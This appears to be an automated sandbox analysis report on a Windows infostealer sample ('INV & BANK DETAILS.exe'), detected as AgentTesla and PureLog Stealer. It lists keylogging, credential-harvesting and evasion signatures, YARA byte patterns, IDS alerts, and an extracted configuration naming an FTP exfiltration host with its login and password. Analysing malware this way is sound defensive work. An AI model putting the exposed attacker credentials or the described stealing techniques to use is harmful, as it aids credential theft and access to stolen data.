Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INV & BANK DETAILS.exe

Overview

General Information

Sample name:INV & BANK DETAILS.exe
Analysis ID:1554927
MD5:fc4da7be71ac1824d53d208381e5cdf9
SHA1:bb5a2e6eb6d4b001e3096bed7d3b9e9224731cc4
SHA256:4f832525b2ee96d1b31269451bf6576002e8c02f9496f596c4c1bb3ce3ac0b15
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • INV & BANK DETAILS.exe (PID: 5512 cmdline: "C:\Users\user\Desktop\INV & BANK DETAILS.exe" MD5: FC4DA7BE71AC1824D53D208381E5CDF9)
    • RegSvcs.exe (PID: 3284 cmdline: "C:\Users\user\Desktop\INV & BANK DETAILS.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "me750@jeepcommerce.rs", "Password": "UL^Y]#$dMj?2"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.3865437194.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 B5 88 44 24 2B 88 44 24 2F B0 FD 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            2.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 B5 88 44 24 2B 88 44 24 2F B0 FD 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 B5 88 44 24 2B 88 44 24 2F B0 FD 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            2.2.RegSvcs.exe.3a76458.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.RegSvcs.exe.3a76458.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                2.2.RegSvcs.exe.3a76458.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 86 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T08:30:30.270194+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849708TCP
                  2024-11-13T08:31:08.643253+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849713TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T08:30:17.871461+010020299271A Network Trojan was detected192.168.2.849706195.252.110.25321TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T08:30:18.639491+010028555421A Network Trojan was detected192.168.2.849707195.252.110.25349556TCP
                  2024-11-13T08:30:18.644980+010028555421A Network Trojan was detected192.168.2.849707195.252.110.25349556TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: INV & BANK DETAILS.exeAvira: detected
                  Source: http://ftp.jeepcommerce.rsAvira URL Cloud: Label: malware
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "me750@jeepcommerce.rs", "Password": "UL^Y]#$dMj?2"}
                  Source: INV & BANK DETAILS.exeReversingLabs: Detection: 63%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: INV & BANK DETAILS.exeJoe Sandbox ML: detected
                  Source: INV & BANK DETAILS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: INV & BANK DETAILS.exe, 00000000.00000003.1424571360.0000000004070000.00000004.00001000.00020000.00000000.sdmp, INV & BANK DETAILS.exe, 00000000.00000003.1423214260.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: INV & BANK DETAILS.exe, 00000000.00000003.1424571360.0000000004070000.00000004.00001000.00020000.00000000.sdmp, INV & BANK DETAILS.exe, 00000000.00000003.1423214260.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49707 -> 195.252.110.253:49556
                  Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49706 -> 195.252.110.253:21
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.8:49707 -> 195.252.110.253:49556
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: unknownDNS query: name: ip-api.com
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49713
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49708
                  Source: unknownFTP traffic detected: 195.252.110.253:21 -> 192.168.2.8:49706 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: ftp.jeepcommerce.rs
                  Source: RegSvcs.exe, 00000002.00000002.3866572606.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.jeepcommerce.rs
                  Source: RegSvcs.exe, 00000002.00000002.3866572606.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: RegSvcs.exe, 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3866572606.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: RegSvcs.exe, 00000002.00000002.3866572606.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, n00.cs.Net Code: Y3mlQs3iB4
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                  System Summary

                  barindex
                  Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.INV & BANK DETAILS.exe.b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000002.00000002.3865437194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000000.00000002.1431447350.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004096A00_2_004096A0
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0042200C0_2_0042200C
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0041A2170_2_0041A217
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004122160_2_00412216
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0042435D0_2_0042435D
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004033C00_2_004033C0
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044F4300_2_0044F430
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004125E80_2_004125E8
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044663B0_2_0044663B
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004138010_2_00413801
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0042096F0_2_0042096F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004129D00_2_004129D0
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004119E30_2_004119E3
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0041C9AE0_2_0041C9AE
